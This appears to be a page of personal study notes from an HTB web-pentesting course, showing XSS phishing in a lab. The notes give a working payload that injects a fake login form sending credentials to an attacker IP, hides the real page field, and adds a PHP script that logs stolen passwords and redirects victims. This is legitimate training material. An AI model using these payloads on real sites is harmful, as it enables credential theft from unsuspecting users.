brain_fuck
Checklists
Checklists
  • 📁What Is It
  • 🐧Linux Hardening
    • Privilege Escalation - Linux
      • SUDO
      • Kernel Exploit
      • SUID or SGID
      • Capabilities
      • Cron Jobs
      • PATH Hijacking
      • NFS (Network File Sharing)
  • 🖼️Windows Hardening
    • Privilege Escalation - Windows
      • Abusing dangerous privileges
      • Abusing Service Misconfigurations
      • Abusing Vulnerable Software
      • Recopilación de contraseñas en sitios habituales
      • Otras escaladas
    • AD - Active Directory
      • Basic AD
      • Samba & NTML Relay
      • Pass The Hash (PTH)
      • Kerberoasting Attack
      • Golden Ticket & Pass The Ticket (PTT)
  • 🧰Tools
    • Nmap
    • John the Ripper
      • zip2john
    • Gobuster
    • Smbmap
    • Smbclient
    • WPScan
    • GitHack
    • Chisel
      • Proxychains/Sock
    • Hydra
    • Msfvenom
    • CrackMapExec
    • Psexec
    • BloondHound
    • Rpcclient
    • Ldapdomaindump
    • Evil-wmr
    • Burpsuite
    • KeyHunter
  • 📡Ports
    • 21 - FTP
    • 22 - SSH
    • 25 - SMTP
    • 53 - DNS
    • 443 - HTTPS
    • 139;445 - SMB
    • 3389 - RDP
    • 5985 - Wsman
  • 🍎Red - Bash Scripting
    • Pivoting
  • 🧙‍♂️Pentesting Methodology
    • Pivoting
      • Ligolo-ng
  • 🌐OSINT
    • Gps-Coordinates
    • GPG
    • Sherlock
    • Whatsmyname
    • Wiggle
    • Image & Geospatial Intelligence
    • FFmpeg - Geolocating Videos
  • 🗒️TO-DO
  • 🕷️HTB-CBBH
    • Web Requests - Fundamentals
      • HTTP Fundamentals
        • HyperText Transfer Protocol (HTTP)
          • Hypertext Transfer Protocol Secure (HTTPS)
        • HTTP Requests and Responses
        • HTTP Headers
      • HTTP Methods
        • HTTP Methods & Codes
        • GET
        • POST
        • CRUD API
    • Introduction to Web Applications - Fundamentals
      • Front Components & Vulns
      • Back End Components & Vulns
    • Hacking WordPress
      • Info
      • Enumeration
      • Exploitin
    • Using Web Proxies
      • Web Proxy
      • Web Fuzzer
      • Extensions
    • Information Gathering - Web Edition
      • DNS & Subdomains
    • Attacking Web Applications with Ffuf
      • Fuzzing
    • JavaScript Deobfuscation
      • Deobfuscation & Decode
    • Cross-Site Scripting (XSS)
      • XSS Basics
      • XSS Phishing
      • Blind XSS - Session Hijacking
    • SQL Injection
      • Databases & Queries
      • SQL Injections
      • Exploitation
        • Database Enumeration
        • Reading Files
        • Writing Files
      • Skill Assessment
    • SQLMap Essentials
      • Building Attacks
Powered by GitBook
On this page
  • Login Form Injection
  • Cleaning Up
  • Credential Stealing
  1. HTB-CBBH
  2. Cross-Site Scripting (XSS)

XSS Phishing

PreviousXSS BasicsNextBlind XSS - Session Hijacking

Last updated 11 days ago

Login Form Injection

<h3>Please login to continue</h3>
<form action=http://10.10.14.146:8000>
    <input type="username" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="submit" value="Login">
</form>

In the above HTML code, OUR_IP is the IP of our VM, which we can find with the (ip a) command under tun0.

To write HTML code to the vulnerable page, we can use the JavaScript function document.write(), and use it in the XSS payload we found earlier in the XSS Discovery step. Once we minify our HTML code into a single line and add it inside the write function, the final JavaScript code should be as follows:

document.write('<h3>Please login to continue</h3><form action=http://10.10.14.146:8000><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');

Cleaning Up

We can see that the URL field is still displayed, which defeats our line of "Please login to continue". So, to encourage the victim to use the login form, we should remove the URL field, such that they may think that they have to log in to be able to use the page. To do so, we can use the JavaScript function document.getElementById().remove() function.

To find the id of the HTML element we want to remove, we can open the Page Inspector Picker by clicking [CTRL+SHIFT+C] and then clicking on the element we need:

As we see in both the source code and the hover text, the url form has the id urlform:

<form role="form" action="index.php" method="GET" id='urlform'>
    <input type="text" placeholder="Image URL" name="url">
</form>

So, we can now use this id with the remove() function to remove the URL form:

document.getElementById('urlform').remove();

Now, once we add this code to our previous JavaScript code (after the document.write function), we can use this new JavaScript code in our payload:

document.write('<h3>Please login to continue</h3><form action=http://10.10.14.146:8000><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

After, we write the function <script></script> and remove comments with <!--

'><script>document.write('<h3>Please login to continue</h3><form action="http://10.10.14.146:8000"><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById("urlform")?.remove();</script><!--

Credential Stealing

To do so, we can start listening on port 80 in our Pwnbox, as follows:

eldeim@htb[/htb]$ sudo nc -lvnp 80
listening on [any] 80 ...

Now, let's attempt to login with the credentials test:test, and check the netcat output we get (don't forget to replace OUR_IP in the XSS payload with your actual IP):

connect to [10.10.XX.XX] from (UNKNOWN) [10.10.XX.XX] XXXXX
GET /?username=test&password=test&submit=Login HTTP/1.1
Host: 10.10.XX.XX
...SNIP...

As we can see, we can capture the credentials in the HTTP request URL (/?username=test&password=test). If any victim attempts to log in with the form, we will get their credentials.

However, as we are only listening with a netcat listener, it will not handle the HTTP request correctly, and the victim would get an Unable to connect error, which may raise some suspicions

The following PHP script should do what we need, and we will write it to a file on our VM that we'll call index.php and place it in /tmp/tmpserver/ (don't forget to replace SERVER_IP with the ip from our exercise):

<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://SERVER_IP/phishing/index.php");
    fclose($file);
    exit();
}
?>

Now that we have our index.php file ready, we can start a PHP listening server, which we can use instead of the basic netcat listener we used earlier:

eldeim@htb[/htb]$ mkdir /tmp/tmpserver
eldeim@htb[/htb]$ cd /tmp/tmpserver
eldeim@htb[/htb]$ vi index.php #at this step we wrote our index.php file
eldeim@htb[/htb]$ sudo php -S 0.0.0.0:80
PHP 7.4.15 Development Server (http://0.0.0.0:80) started
🕷️